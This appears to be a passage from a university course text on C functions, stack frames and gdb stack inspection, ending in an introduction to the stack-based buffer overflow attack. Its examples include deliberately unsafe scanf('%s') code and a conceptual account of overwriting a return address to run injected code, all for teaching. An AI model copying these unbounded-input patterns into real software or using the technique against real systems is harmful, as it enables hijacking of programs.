(a) Demonstrate the ability to analyze simple programs using functions.
(b) Describe the organization and contents of a program’s stack throughout the program’s execution.
(c) Demonstrate the ability to examine the stack values of a running program.
1. Functions
1.1. Introduction It is often best to solve a large problem by successively decomposing it into smaller and smaller
subproblems until the subproblems are easy enough to directly implement in C.
C facilitates this process by providing a mechanism for building up a large program from small subprograms called functions.
A large complicated program can be constructed by combining a number of smaller programs (functions), each of which
performs specific simple tasks.
To use a function we must invoke it with a function call. The function call specifies:


the function name
the arguments—i.e., the inputs—provided to the function
The syntax for a function call is:
function_name ( argument_1, argument_2, ..., argument_n)
Again, the arguments are the inputs to the function. Functions might (and often do) have only one argument. In fact, some
functions have no arguments! If a function has arguments, the arguments can be numbers, variables or more complicated
expressions.
The value a function computes is called the return value. The return value can be thought of as the output of a function.
Functions can only have at most one return value. Many functions have no return value.
This probably all sounds a bit vague, so let's look at a concrete example. Suppose there was a function named sqrt, used to
determine the square root of a number. In the statement
y = sqrt( x ) ;
the variable x is the function’s argument (input) and sqrt( x ) is the function call. The value computed by the function
is the function’s output, or return value. For example, if x has the value 9.0, then the function’s return value is 3.0, and this
value is placed into the variable y.
Functions promote the writing of good programs. If we have to solve a large problem, we successively decompose the large
problem into smaller sub-problems until the sub-problems are easy to directly implement as statements in the C programming
language. Once we have finished dividing a large problem into individual sub-problems, we write small programs – called
functions – to solve each of these individual subtasks.
135
1.2. User-Defined Functions C has predefined functions which we can use, but we can also write our own functions.
Functions we write ourselves are called user-defined functions. To use our own functions, we must write the code that permits
the function to perform its required task.
The Function Definition The function definition describes how the function accomplishes its task. A function definition is a
small program. When we call the function, we run this small program. The syntax is:
data type of the result returned by the function
the data type of parameter_1
the data type of parameter_n
type_returned
function_name( type_1
{
body of the function
}
parameter_1 , … , type_n
parameter_n )
Arguments vs. Parameters In a function call, the inputs to the function are called the arguments. These values of the arguments
are plugged in for the parameters in the function definition before the body of the function is executed.
A parameter should be thought of as a placeholder that “stands in” for an argument. The person writing the function may not
know the names chosen for the arguments, so he just picks his own parameter names that will serve to stand in for the arguments.
The return Statement The return statement consists of the keyword return followed by an expression. The value of
the expression is what is returned to the statement which called the function. In other words, the value of the expression after
the return keyword is the function’s output. The function ends when the return statement executes.
An Extended Example Suppose a person wants to write a function that calculates the absolute value of an integer. Utilizing
the if-else statement which you learned in Chapter 3, the absolute value of an integer (given the name number in the program
snippet below) can be calculated as:
if(number >= 0)
{
AV = number;
}
else
{
AV = -1 * number;
}
If we had a function named AbsVal( x ) which returns the absolute value of a given integer, x, we could write the program
as:
#include <stdio.h>
int main()
{
int x, y;
printf("Enter an integer: ");
scanf("%d" , &x );
y = AbsVal(x);
printf("The absolute value of the integer is %d\n" , y);
}
Problem: The program above will not work because there is no built-in function named AbsVal, so we’ll define one.
136
The following program will work:
#include <stdio.h>
int AbsVal( int number)
{
int AV;
if(number >=0)
{
AV = number;
}
else
{
AV = -1*number;
}
return AV;
}
int main()
{
int x, y;
printf("Enter an integer: ");
scanf("%d" , &x );
y = AbsVal(x);
printf("The absolute value of the integer is %d\n" , y);
}
The program above starts executing at the line of code that has the word main in it. The next line declares the variables x and
y, and since they are not initialized, they have random garbage values.
#include <stdio.h>
int AbsVal( int number)
{
int AV;
if(number >=0)
{
AV = number;
}
else
{
AV = -1*number;
}
return AV;
}
Garbage values!
int main()
{
int x, y;
The program starts here.
x
-149248
printf("Enter an integer: ");
scanf("%d" , &x );
y = AbsVal(x);
printf("The absolute value of the integer is %d\n" , y);
137
y
23972
}
When the user is prompted to enter an integer, let’s say that he enters the value -5. This value is then placed in the variable x.
#include <stdio.h>
int AbsVal( int number)
{
int AV;
if(number >=0)
{
AV = number;
}
else
{
AV = -1*number;
}
return AV;
}
Garbage value!
int main()
{
int x, y;
printf("Enter an integer: ");
scanf("%d" , &x );
x
-5
23972
y
y = AbsVal(x);
printf("The absolute value of the integer is %d\n" , y);
}
Now we reach the line with the function call ( y = AbsVal(x); ) . The program jumps to the first line of the function
named AbsVal .
#include <stdio.h>
int AbsVal(int number)
{
int AV;
if(number >=0)
{
AV = number;
}
else
{
AV = -1*number;
}
return AV;
}
int main()
{
int x, y;
x
-5
y
23972
printf("Enter an integer: ");
scanf("%d" , &x );
When we reach this line…we jump to the function!
y = AbsVal(x);
printf("The absolute value of the integer is %d\n" , y);
}
138
And the value of the argument x is plugged into the parameter number .
#include <stdio.h>
int AbsVal( int number)
{
int AV;
if(number >=0)
{
AV = number;
}
else
{
AV = -1*number;
}
return AV;
}
number
-5
A copy of the value of x (in this
case -5) is placed in the
parameter named number.
int main()
{
int x, y;
x
-5
y
23972
printf("Enter an integer: ");
scanf("%d" , &x );
y = AbsVal(x);
printf("The absolute value of the integer is %d\n" , y);
}
Now the function declares its own variable named AV which initially has a garbage value, but is set equal to 5 in the else
statement.
#include <stdio.h>
int AbsVal( int number)
{
int AV;
if(number >=0)
{
AV = number;
}
else
{
AV = -1*number;
}
return AV;
}
number
AV
-5
AV
-944001
AV is changed
from a garbage
value to 5.
5
int main()
{
int x, y;
printf("Enter an integer: ");
scanf("%d" , &x );
x
-5
y
y = AbsVal(x);
printf("The absolute value of the integer is %d\n" , y);
139
23972
}
Now, when we reach the return statement ( return AV; ) , we jump back to the original function call and the value of AV
(which is 5) is placed in the variable y.
#include <stdio.h>
int AbsVal( int number)
{
int AV;
if(number >=0)
{
AV = number;
}
else
{
AV = -1*number;
}
return AV;
}
number
-5
AV
5
int main()
{
int x, y;
printf("Enter an integer: ");
scanf("%d" , &x );
y = AbsVal(x);
x
-5
y
5
printf("The absolute value of the integer is %d\n" , y);
}
1.3. void functions Functions that produce no values for the rest of the program to use are called void functions. A common
example: We want a function to send a message or some output to the screen. The output is sent to the screen, but is not sent
back for use in the rest of the program.
The syntax for the function definition of a void function is then:
void function_name(type_1 parameter_1,… , type_n
{
body of the function
return ;
}
parameter_n)
The function call would be simply
function_name(argument_1, … , argument_n);
So, there are three key differences between the syntax of void functions and the syntax of other functions:



keyword void is used instead of a return type.
the return statement in the function definition does not contain any expression to be returned. In fact, the
return statement can be entirely omitted.
The function call is not used as the right side of an assignment statement.
We can rewrite our earlier example, using a void function, called output, to provide this output value. This is shown on the
next page. The function named output will be used to replace the printf statement that displays your absolute value.
140
#include <stdio.h>
int AbsVal( int number)
{
int AV;
if(number >=0)
{
AV = number;
}
else
{
AV = -1*number;
}
return AV;
}
Note the new function named output.
void output( int Abs_Num )
{
printf("The absolute value of the integer is %d\n" , Abs_Num);
}
int main()
{
int x, y;
printf("Enter an integer: ");
The function named output is called here.
The value of the argument y is plugged into
the parameter Abs_Num .
scanf("%d" , &x );
y = AbsVal(x);
output(y);
}
1.4. The main function Would you believe that you have been using functions all along! In fact, main is a function. It is a
very special function in that all programs begin executing at the main function.
Practice Problem 6.1
Circle the appropriate words to complete the statements below. Each set of bold terms separated with a slash indicates that
you should select one of the choices.
To use a function we must invoke it with a return value / function call / prototype.
The values / parameters / arguments are the inputs to a function.
A value / parameter / argument is a placeholder that “stands in” for a value / parameter / argument.
The result from a function is called the return value / function call / prototype.
Solution:
To use a function we must invoke it with a return value / function call / prototype.
The values / parameters / arguments are the inputs to a function.
A value / parameter / argument is a placeholder that “stands in” for a value / parameter / argument.
The result from a function is called the return value / function call / prototype.
Practice Problem 6.2
What is the primary purpose of a function in a programming language (i.e., why are they used)?
Solution:
141
Practice Problem 6.3
Explain the error made during the call to the addthendisplay() function below.
#include<stdio.h>
void addthendisplay( int first_num, int second_num )
{
int sum_of_num = first_num + second_num;
printf("\nThe sum of the numbers is: %d\n\n", sum_of_num);
}
int main()
{
int num1 = 27, num2 = 34, num3 = 13;
addthendisplay( num1 , num2 , num3 );
}
Solution:
The way that functions are handled by the CPU is the last piece that we need before understanding an important attack called
the buffer overflow attack. Would you believe that the way functions are handled by the CPU can, in the words of an infamous
hacker, “produce some of the most insidious data-dependent bugs known to mankind.” Put another way, these functions
intended to help us can open the door to allow your computer to be hijacked.
2. The Stack
2.1. A Program in Memory. Let’s think about what happens when a program is loaded into memory. Recall that the source
code that we write is translated into machine language instructions, and these machine language instructions are fetched,
decoded, and then executed, one-by-one.
So… you would surely agree that the program itself must reside in main memory. When the operating system executes a
program, it allocates a block of memory for the machine language code that comprises the program. This section of memory
is termed the text segment.
When the program is placed in the text segment, additional adjacent memory is given to the program to hold the values that it
needs to successfully execute (e.g., values of variables). As we have mentioned, this section is called the stack.
2.2 The Stack during a Function Call. Let’s look at an example of how the previous program would run in memory. For
this first example, we will make some simplifying assumptions:


We’ll look at source code instead of object code
We’ll assume everything (an instruction, a stored character, a stored integer, etc.) consumes one address.
142
So, let’s suppose the program is loaded as shown below.
The program starts here.
The stack
All programs begin execution at main. So, when execution begins, the eip register (the instruction pointer) holds the address
of the next instruction to be executed: 0x080483c3
This specific instruction is fetched, decoded and executed, and the eip register is then incremented so that it points to the next
instruction. (Actually, this incrementing occurs after the fetch, but before the decode and execute.) As the program executes,
this process (fetch, increment eip, decode the fetched instruction, execute) is repeated.
Early on in the program we declare variables x and y. Space has
to be allotted for these variables. This is where the stack comes in!
These variables are stored on the stack.
The stack
Also, since we are calling a function and passing a value, the
argument for the function is stored in memory. Since, in this
program, we are passing the value of the variable x , the compiler
will copy the value of the variable x and store it in memory. In this
program, the name of the copied value is number.
So, now our picture looks like this:
143
The stack
Recall that two important registers—ebp and esp—are used to keep track of the location of the stack in memory.


The stack pointer register, esp, points to the memory address at the top of the stack.
The base register ebp points to the memory location at the bottom (the base) of the stack—literally, the very next
address after the bottom variable.
So, our picture looks like this:
The stack
The program continues to run along, line by line, until 0x080483c8 is reached. At this point we are in trouble because we
have to jump to an instruction that is not in order. The next instruction is at memory location 0x080483b5.
Consider the difficulty the CPU now encounters:

We go to a different function (Abs_Val) that has its own variables

We have to know where to jump back to when the function Abs_Val is done.

We certainly don’t want to lose main’s variables when Abs_Val is done
So, here is what we do. Each function that is called gets its own section of the stack to work with, called its stack frame. So,
for the stack frame for main , at this point in time, comprises addresses
0xbffff7d7 – 0xbffff7d9
Now, we are going to give Abs_Val a stack frame for it to use for its own variables. After we are done executing the function
Abs_Val , we will go back to the main function, and it will go back to using main's own stack frame.
Now, think about this, if we are going to give Abs_Val a stack frame to play with, what information will we need to restore
the situation to the way it was before Abs_Val was called? To restore things to the way they were before, we need

The proper return address for eip

The prior value of the base pointer ebp
How should we “remember” these values? By placing these two items in the stack frame for the main function:
The stack
144
Now, we can safely jump to the function Abs_Val. This function has one variable, so the stack now looks like this:
The stack
What happens when we reach the return statement in the function Abs_Val? At that point we restore the stack frame for
main. But… how do we do that?
Easy! We know where to reset esp (the stack pointer): In the picture above, we can reset esp to be ebp + 2.
We know what instruction address should be placed in eip:
+ 1 into eip.
In the picture above, we place the value stored in address ebp
We know where to reset ebp (the base pointer): In the picture above, we reset ebp to the value pointed to be ebp. In this
case, ebp points to the value of 0xbffff7da, so we reset ebp to point to address 0xbffff7da.
Practice Problem 6.4
Place the following elements in the order the will appear (from bottom to top) on the stack during a function call from main
(while executing the instructions for that function).
•
•
•
•
•
Return Address
main’s Variables
Function’s Variables
Saved value of prior ebp
Function’s Arguments
Solution:
145
Practice Problem 6.5
(a) Given the following source code and debugger output, construct the stack frame for the function main in the diagram
below part b. Show where the base pointer (label as EBP-Main) and stack pointer (label as ESP-Main) are pointing to, and
show where the arguments to exam_function are stored in memory.
#include<stdio.h>
void exam_function( int x, int y, int z)
{
int some_class;
int best_class;
int my_class;
best_class = x;
my_class = z;
some_class = y;
}
int main()
{
exam_function( 2005, 2003, 2015 );
}
(b) Using your answer from part a), and the additional debugger output below, construct the stack frame for the function
exam_function. Show the location of the base pointer (label as EBP-Exam) and stack pointer (label as ESP-Exam) on
the figure. Note on your figure:
• the location of best_class, some_class, and my_class
• the location of the return address
• the location of the prior value of the base pointer (EBP-Main)
146
Solution:
Address
BFFFF7E8
BFFFF7EC
BFFFF7F0
BFFFF7F4
BFFFF7F8
BFFFF7FC
BFFFF800
BFFFF804
BFFFF808
BFFFF80C
BFFFF810
BFFFF814
BFFFF818
BFFFF81C
BFFFF820
Value
Description
147
148
Problems
1.
Consider the program below which uses a user-defined function named maximum that returns the largest of three
numbers. A screen capture of how the program should appear is also shown. Your job: Fill in the three missing
blanks!
#include<stdio.h>
float maximum(float x, float y, float z)
{
float max;
if(
{
)
max = x;
}
else
{
max = y;
}
if( z > max )
{
;
}
return
;
}
int main()
{
float number1, number2, number3;
printf("Enter three numbers and I will tell you the largest: ");
scanf( "%f %f %f"
,
&number1 , &number2
, &number3 );
printf("The largest is %f \n", maximum(number1, number2, number3) );
}
2.
NOTE ABOUT THIS PROBLEM: Although this problem reads sort of like a tutorial (i.e., “type these commands,
then answer these questions”) it’s critical to note that the tutorial aspect of this problem is incomplete. That is, you’ll
need to type in additional commands at various points, beyond what’s given, in order to be able to answer the questions.
Look to Security Exercise 6 for inspiration. There are different ways to go about getting the answers to this question,
but gdb commands such as list, disass main, disass test_function, nexti, and/or x/10xb $esp
(where “10” would be replaced by the number of stack frame bytes - starting at the top of the stack - that you wish to
view) may come in handy.
Carefully enter the following C program
void test_function( int a, int b, int c, int d, int e)
{
int flag;
char buffer[ 10 ];
Note: One blank line!
flag = 1234
buffer[ 0 ]
buffer[ 1 ]
buffer[ 2 ]
;
= 'U' ;
= 'S' ;
= 'A' ;
}
int main( )
{
test_function( 5, 6, 7, 8 , 9 ) ;
}
149
(a)
Compile your program by entering gcc –g followed by the name of your C program (e.g.: if you named
your program hwk6.c, you would enter gcc –g hwk6.c ). Then start the debugger by entering:
gdb –q
./a.out
set dis intel
Now, we want to run the program up to the call to test_function – that is, the breakpoint should
correlate with the line that reads test_function( 5, 6, 7, 8 , 9 ), which should be 13 if the
program was entered exactly as shown above. So, enter
break 13
run
Sketch a picture of the stack frame for main, showing where the base pointer and stack pointer are pointing
to, and show where you believe the arguments to test function will be are stored in memory. Then, enter a
second breakpoint:
break test_function
continue
and identify where the arguments to the test function are actually stored in memory (i.e., where the values 5,
6, 7, 8 and 9 are stored in memory). Were you correct?
(b)
Run the program up to the point of reaching the closing brace of test_function. To do this, enter:
break 10
continue
Sketch the contents of the stack frame for test_function as well as the additional memory locations
below the base pointer. Use the figure on the next page. Show the location of the base pointer and stack
pointer on your figure. Note on your sketch:
 the location of flag
 the location of buffer
 the location of the return address
 the location of the prior value of the base pointer
ebp_main
150
3.
Of the four choices below (a, b, c or d), select the most appropriate function definition to replace the commented line
in the program.
#include<stdio.h>
//YOUR ANSWER HERE//
{
float c_sq = a * a + b * b;
return c_sq;
}
int main()
{
float answer;
answer = hypot( 7.12 , 6.37);
printf(“The square of the hypotenuse is: %f\n”, answer);
}
(a)
(b)
(c)
(d)
4.
float hypot(float a, float b, float c)
float hypot(int a, int b)
void hypot(float a, float b)
float hypot(float a, float b)
Sketch the contents of the stack frame for main under the column labeled Data in hexadecimal. Locate and label the
base pointer as ebp_main and the stack pointer as esp_main under Stack Frame Info. Locate and label the
variables g, fox[0], fox[1] under What is Represented. (Note: Not every block in the table will be filled in.)
#include<stdio.h>
int main()
{
char fox[2];
fox[0] = 'B';
fox[1] = 0;
int g = 17;
}
Address:
0xBFFFF810
Data:
What is Represented:
0xBFFFF811
0xBFFFF812
0xBFFFF813
0xBFFFF814
0xBFFFF815
0xBFFFF816
0xBFFFF817
0xBFFFF818
151
Stack Frame Info:
152
Security Exercise 6
Part 1. Initial Setup
Today you will use the program sx6.c which has been written for you and placed
in the ec310code directory.
Copy this file to the work directory by carefully entering the following at the home
directory prompt:
midshipman@EC310:~ $
cp
ec310code/sx6.c
Make sure you are at your home directory!
If you fear making anyone
mad, then you ultimately
probe for the lowest common
denominator of human
achievement. And, by the
way, who am I?
work
Enter this!
Verify that you have sx6.c in your work directory by changing to the work
directory:
cd work
and then listing the files in the work directory:
ls
If you do not have sx6.c in your work directory STOP and ask your instructor
or lab tech for help. Otherwise, proceed to Part 2.
Part 2. Our Program for Today
Look at the program sx6.c using nano. The program sx6.c is shown below:
void test_function( int a, int b, int c, int d)
{
int flag;
char buffer[ 10 ];
flag = 31337;
buffer[ 0 ] = ‘A’ ;
}
int main( )
{
test_function( 1, 2, 3, 4 ) ;
}
Note that to make this first exploration of the stack as simple as possible, we did NOT include the line
#include<stdio.h>
in our program. 12
This is okay, since we do not use any input (scanf) or output (printf) statements.
Note that this program produces no output. It truly is a useless program… but it’s simple enough to explore the stack for the
first time.
Question 1:
How many functions are in the program?
12
This program is a very slightly modified version of the program named stack_example.c from page 71 of the Erickson text. We have modified the
layout of the braces to the form we are familiar with.
153
Save your program ( Control-o ) and exit nano ( Control-x) and then compile your program using
gcc –g sx6.c
and then run your program
./a.out
to confirm it executes without errors. (The program does not produce any output—you are just making sure you do not get any
error messages.) If your program is not working STOP and ask your instructor for help. Otherwise, proceed to Part 3.
Part 3. The Two Functions in Memory
Question 2:
Note that the function named test_function is passed four arguments: 1, 2, 3 and 4. How
much memory (in bytes) does each of these four arguments need?
Question 3:
How much memory (in bytes) is needed to store test_function ‘s flag variable?
Question 4:
How much memory (in bytes) is needed to store test_function ‘s array named buffer?
Let’s examine how the main function is stored in memory. Enter:
gdb –q
./a.out
set dis intel
disass main
You should see this:
Recall that the assembly language code above corresponds to the main function, repeated below:
int main( )
{
test_function( 1, 2, 3, 4 ) ;
}
Question 5:
Where in main memory is the first instruction that starts the main function?
154
Now let’s examine how the function named test_function is stored in memory. Enter:
disass test_function
You should see this:
Question 6:
Where in main memory is the first instruction that starts the function named test_function?
So…what’s really going on? To answer this, we will look at the stack frame for each of our two functions. Onward to Part 4!
Part 4. The Stack Frame for main
Let’s set a breakpoint in main right before the call to test_function. Enter the following commands:
list main
break 11
This is line 11. So, the command
run
break 11
You should see:
Question 7:
will run our program to the point of this line
(but not including this line!). That means
that our program will pause right before the
call to the function named
test_function.
What address is stored in the instruction pointer (i.e., the eip register)?
Go back to the assembly code for main (shown on the preceding page).
Question 8. Based on your answer to question 7, what is the assembly language instruction that the instruction pointer
is pointing to? Is this still in the main function?
So, let's start looking at the stack! Recall that the stack is the area in main memory that the program has available to store any
values that it needs for successful execution (such as variables, arguments, important addresses, etc.). The active part of the
stack is bounded by the two registers esp and ebp.
155
Question 9:
What are the addresses stored in the stack pointer (esp) and the base pointer (ebp) ?
Question 10.
Considering the values of esp and ebp, how many bytes are in this stack frame? (Hint: you must
remember that these values are in hexadecimal! Recall that esp points to the first address in the
stack frame and ebp points to the first address after the stack frame. Thus, subtracting the address
pointed to by esp from the address pointed to by ebp provides the number of bytes in the stack
frame.)
Question 11:
In the picture of memory shown on your answer sheet, note that the base pointer points to the bottom
of the stack.

Fill in the addresses next to each byte (for ease, you may, if you wish, label only the last
four hexadecimal digits of each address).

Indicate on the diagram where the stack pointer is pointing to.
Now, looking at where the instruction pointer is pointing to, the next four instructions that should be executed are (but don’t
actually execute these just yet):
mov
mov
mov
mov
DWORD
DWORD
DWORD
DWORD
PTR
PTR
PTR
PTR
[esp+12],0x4
[esp+8],0x3
[esp+4],0x2
[esp],0x1
In English, the first of these instructions says:
Place the value 4 in the memory location given by esp + 12 (i.e., the stack pointer + 12). Note that the 12 in this
case is given in base-10.
Similarly, the second of these instructions says:
Place the value 3 in the memory location given by esp + 8 (i.e., the stack pointer + 8). Note that the 8 in this case is
given in base-10.
Question 12:
Modify the diagram shown in Question 11 to show what the stack should look like after these four
instructions are executed. Remember that an integer (such as 4) takes up four bytes.
Enter
nexti
four times to execute these four assembly language instructions. Now, examine the stack to see if the picture you drew in
Question 12 is correct.
156
Examine the stack? How do we do that?
Well, to examine the word stored at the address contained in the stack pointer, we can enter:
x/xw $esp
To examine the word stored at the address four bytes later, we can enter:
x/xw $esp + 4
And so forth. As an alternative, you could use x/xw followed by the address you want to examine. For instance, to examine
the word that is stored at the address 0xbffff80c I would enter: x/xw 0xbffff80c.
Show your instructor your answer to Questions 11-12. If you are on the right track, you will be told to move on to Part 5!
Part 5. The Stack Frame for test_function
So, we will soon jump to the function named test_function. As we discussed in lecture, this will establish a new stack
frame. After the function named test_function is done, we have to be able to return to main's stack frame. To return
to the main function, main must save on the stack:

The proper return address for eip

The prior value of the base pointer ebp
Let's first establish what these values should be.
Question 13:
What is the old (prior) value of the base pointer that must be saved on the stack?
Look carefully at the assembly language code for main shown on back in Part 3 of this Security Exercise.
Question 14:
What is the value of the return address that we must save, so that the instruction pointer can be reset
back to the correct line of code after the function call to test_function is complete?
Let's jump into the function named test_function.
Enter:
list test_function
break 8
continue
You should see:
157
Notice that by inserting a breakpoint at line 8, we are within (but at the end of) test_function.
Question 15:
What address is stored in the instruction pointer (i.e., the eip register)?
Question 16.
Based on your answer to Question 15, what is the assembly language instruction that the instruction
pointer is pointing to (i.e., the next instruction that will execute, but has not yet executed)?
Question 17:
What are the addresses stored in the stack pointer (esp) and the base pointer (ebp) ?
Question 18.
Considering the values of esp and ebp, how many bytes are in this stack frame? (Hint: you must
remember that these values are in hexadecimal!)
Show your instructor your answer to Questions 17-18. If you are on the right track, you will be told to move on to Part 6!
Part 6: Do you have the skills of a hacker?
Now you will be put to the test! Have you developed hacking skills? Let’s see!
Question 19:
Using all the skills you have learned so far, attempt to determine the contents of the stack frame for
test_function as well as the additional memory locations below the base pointer. Fill in your
answers on the picture for Question 19. The arrow on the figure shows where you should place the
base pointer (ebp). All other info should be based upon anchoring the base pointer at the location
shown. Specifically:

Show the address for each byte (last four hex digits)

where is flag? (Hint: convert the value to hexadecimal)

Where is buffer? (Hint: You should hunt for buffer[0] )

Where is the return address (see your answer to Question 14)?

Where is the old value of the base pointer (see your answer to Question 13)?
158
Security Exercise 6 Answer Sheet
Name: __________________
Question 1:
Question 2:
Question 3:
Question 4:
Question 5:
Question 6:
Question 7:
Question 8:
Question 9:
Question 10:
Question 11 and Question 12:
Address
Value stored
159
Question 13:
Question 14:
Question 15:
Question 16:
Question 17:
Question 18:
Question 19 is on the next page.
160
Address
Value stored
161
162
Chapter 7: The Buffer Overflow
Objectives:
(a) Describe the buffer overflow attack, determine what features of C make it possible, and identify who is responsible for
memory management in C.
(b) Demonstrate the ability to craft simple buffer overflow exploits
(c) Explain how specific buffer overflow attacks work by describing stack operations.
(d) Analyze programs that submit input via the command line.
1. The Buffer Overflow Attack
1.1. Introduction The very first major attack on DoD computer networks took place in February of 1998 and lasted for over
a week. The hackers gained administrative (i.e., “root”) access on UNIX machines at 7 Air Force sites and 4 Navy sites, gaining
access to logistical, administrative and accounting records. The method used in this early attack—a buffer overflow—has been
used countless times ever since. Many famous attacks—the Morris Worm, the Code Red Worm, the SQL Slammer Worm, the
Twilight Hack, Blaster, Conficker—used the buffer overflow as a primary attack vector. The recent Stuxnet worm used the
buffer overflow as one of many attack vectors.
The buffer overflow attack is still exceedingly common. An examination of a two-week period in early January 2014 proves
the point. On January 3, 2014, the SANS Institute reported a newly discovered buffer overflow attack against the ubiquitous
Linksys router. On January 9, 2014 a buffer overflow exploit was discovered in the “X Window” system that underpins many
Linux desktops—although discovered in January 2014 this bug was waiting around to be discovered for the previous 22 years!
On January 15, 2014, a penetration testing firm announced the discovery of a zero-day flaw for executing a buffer overflow
attack on a common SCADA system used in the US, the UK and Australia. A security researcher described the potential
ramifications of this latter attack as “the stuff of modern-day nightmares.”
To be sure, the buffer overflow attack is not the only way to cripple a computer system. There are many other ways to attack,
such as cross-site scripting, SQL injection, format string errors, and on and on. You may have learned in SI110 that the
Department of Homeland Security worked together with the SANS Institute, Apple and Oracle back in 2011 to develop a list
of the top 25 software vulnerabilities, and the “classic buffer overflow” came in third, behind SQL injection and OS command
injection (cross-site scripting was 4th). The buffer overflow was the top vulnerability from 2000 through 2005, and has bounced
around the top three spots ever since.
In February 2013, the security firm Sourcefire surveyed Common Vulnerability Scoring System (CVSS) data from 1988 to
2012, and found that buffer overflows were the most-often reported vulnerability. Of the vulnerabilities assigned a category
of “high severity”, buffer overflows comprised over a third of the total. Security analyst Paul Roberts notes that “the stubborn
staying power of buffer overflows for more than two decades – despite gallons of industry ink spilled on the problem – is
dispiriting and has to get us thinking about what it is we’re doing wrong as an industry.”
1.2. In a Nutshell. The simple basis for the attack can be appreciated by examining the following section of C code:
int k = 1000 ;
char my_stuff[ 512 ] ;
my_stuff[ k ] = 'A';
What happens if this code is executed? This array is only allotted 512 bytes; i.e., this array holds character variables
my_stuff[0] through my_stuff[511]. The programmer who wrote the third line of code seems unaware that the last
element of the array is my_stuff[511], since this third line of code assigns a value to the non-existent variable named
my_stuff[1000]. When this code is executed, a byte of memory 488 bytes beyond the end of the array will be overwritten
with the character 'A'.
This error will not be caught at compile-time. In a nutshell, the problem is that C compilers do not check for going beyond the
bounds of an array.
163
This is a big concern because almost all major operating systems are written in C. Additionally, many popular applications are
written in C.
You might be wondering: What exactly happens when the code above is run? The unfortunate answer is: Who knows? Perhaps
nothing noticeable will occur. Perhaps disaster will occur.
Practice Problem 7.1
What feature of the C language makes a buffer overflow attack possible?
Solution:
1.3. Back to the Stack Recall that when a program is to be executed, the operating system reserves a block of main memory
for it.
The “text” segment holds the actual program (the machine language instructions which we can view as assembly-language
instructions.) The memory allotted to the program in the text section does not change; it does not shrink or grow, since the
program does not shrink or grow while it is being executed.
The “stack” is the memory that the program has available to store information during execution. For example, the program’s
variables are stored on the stack.
Let’s look at the program on the right, and examine the stack as it executes.
164
The program begins at the main function, and the variables that are used by the main function are placed on the stack. When
the instruction pointer is at the location shown below on the right, the stack appears as on the left.
Recall that we keep track of the stack using the base pointer (ebp) which points to the bottom of the stack (specifically the
memory location immediately following the bottom of the stack) and the stack pointer (esp) which points to the top of the
stack. Each function gets to place its variables on the stack. The part of the stack that belongs to a function is called that
function’s stack frame. So, the picture above depicts the current stack frame for the main function.
Now, the next instruction has us call the function named happy_times. The values of the arguments are placed on the stack
in preparation for the function call. The stack, before the function call, now looks like this:
The function happy_times also has a variable (the array named alpha_code) and it needs to be allotted its own (separate)
stack frame. But after happy_times are over 13, we will jump back to the main function. So, we still need to keep the stack
13
Of course happy times are never over at USNA….
165
frame for main undisturbed. Additionally, after happy_times are over, we need to resume program execution at the correct
point (i.e., the point in main where we left off when we reached the function call).
So… what do we do?
We place the return address for the next instruction after the function call on the stack, and the old value of the base pointer on
the stack, then we allot space for happy_times’ variable as shown below.
Recall from last lecture that in a function call from main to another
function, the stack will be organized as:
An
Aside
Note that our example conforms to this organization, as it must.
Now, suppose that the function happy_times , as part of its code (shown as “more code” above), prompts the midshipman
to enter his alpha code. The function happy_times uses the character array named alpha_code to hold the value that the
midshipman types in. We have seven bytes reserved on the stack for the alpha number (remember, we need the NULL
terminator).
If all works well, all well and good. And everything always works well at USNA. Right?
Of course not!
Our midshipman was sleepy, and when he was prompted to enter his alpha code (which happens to be 151234) he dozed off
for a micro-nap and accidentally entered:
1512344444444444444444444
<enter>
He entered a total of 25 characters. Think about this. What happens?
166
When the 25 characters are fed into the array alpha_code, the typed-in characters beyond the seventh will start overwriting
memory!
It may be the case that the alpha code overwrites the return address.
Suppose this occurs. What will happen when function happy_times is finished executing? If the return address was indeed
overwritten, then the return address will consist of some of the characters that were in the midst of the alpha string that was
entered.
What will happen then? The instruction pointer will jump to some spurious address. And then... the program will most likely
crash with a segmentation fault. A segmentation fault occurs when a program attempts to access memory outside the region
of main memory that it has been allotted.
This sequence of events, if done intentionally, is called a buffer overflow attack or a stack smashing attack!!!
Practice Problem 7.2
Describe the mechanism by which a segmentation fault occurs.
Solution:
2. A More Malicious Buffer Overflow Attack
2.1. The Buffer Overflow Attack on Steroids Our sleeping midshipman was not trying to do anything malicious—he just
fell asleep like all midshipmen do. But how could this fundamental problem with C described above be exploited to do
something truly evil?
Suppose I: Chose an alpha code that
was not really an “alpha code”...
…heh, heh…
…but was instead a valid machine
language program.
167
So, now, the hacker has placed a program into memory:
But how can the hacker make use of this program?
Think about this: Suppose that when the hacker types in his executable code, he takes care to carefully overwrite the return
address, so that the four bytes that previously held the correct return address are changed to contain the address of
alpha_code! In this case, the return address is the address of the start of the evil program that the hacker has just placed in
memory!
Consider the effect of this action. When function happy_times is done, the "return address" will be placed in the eip
register. But the return address was adjusted to be the start of the executable program that has been surreptitiously placed in
memory. So, the hacker’s program will start executing.
In summary, the hacker has placed his own program in memory and made it execute. The hacker has executed a buffer overflow
attack.
When examining the potential for a buffer overflow, the programmer should consider how a function's variables are placed on
the stack. The first variable encountered is placed on the stack first, the second variable encountered is placed on the stack
next (above the first variable) and so forth.
Practice Problem 7.3
For the pawn function below, is it possible to overwrite the value you will get for your item with an amount of your choosing
by overwriting the value variable on the stack during the scanf( ) call below? Explain.
void pawn()
{
char item[12];
int value = 100;
printf(“What have you come to sell? “);
scanf(“%s”, item);
}
int main()
{
pawn();
}
Solution:
168
Practice Problem 7.4
When the echo_string function is called in main from the following code sample, the stack pictured below is created.
#include<stdio.h>
void echo_string()
{
int count;
char entered_string[10];
printf(“Enter a string: “);
scanf(“%s”, entered_string);
for(count=0; count < 10; count=count+1)
{
printf(“%s\n”,entered_string);
}
}
int main()
{
echo_string();
}
Assuming there is no padding (extra spaces) when the frame is created. How many characters can be entered before the return
address is overwritten?
Solution:
2.2. A Possible Solution: Don't Use C!
If this problem exists simply because C compilers do not check for going beyond the
bounds of an array, an easy way to solve this problem would be to avoid using the C
language altogether. In fact, more modern programming languages such as Java and C#
will not allow a programmer to run beyond the bounds of an array. Why not simply
abandon C and announce to the world: Problem Solved?
We cannot simply abandon C since too many C programs are in circulation. Moreover,
programmers would not want to abandon C even if a magic wand could suddenly convert
all C legacy code into Java programs! Recall from an earlier lecture that even today,
most programmers are programming in C and prefer to program in C.
The C programming language is very popular because it executes quickly and it provides the programmer with a high level of
control over the program. But with this power comes responsibility: Data integrity in C is the programmer's responsibility. If
